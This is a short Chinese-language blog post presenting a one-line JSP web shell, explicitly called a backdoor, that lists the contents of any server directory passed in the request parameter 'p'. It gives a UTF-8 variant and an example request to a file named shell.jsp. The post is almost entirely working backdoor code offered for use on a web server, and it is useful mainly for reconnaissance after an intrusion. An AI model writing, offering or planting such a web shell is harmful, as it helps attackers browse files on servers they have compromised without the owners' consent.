Jsp一行代码遍历当前目录所有文件

yzmm
594 阅读
有小伙伴在求只有遍历文件功能的后门,很简单:
<%=java.util.Arrays.toString(new java.io.File(request.getParameter("p")).list())%>
1 如果需要解决中文乱码问题:
<%@ page language="java" pageEncoding="UTF-8"%>
<%=java.util.Arrays.toString(new java.io.File(request.getParameter("p")).list())%>

请求:http://xxx.com/shell.jsp?p=/ 就可以了,参数p是路径。

评论 (0)

发表评论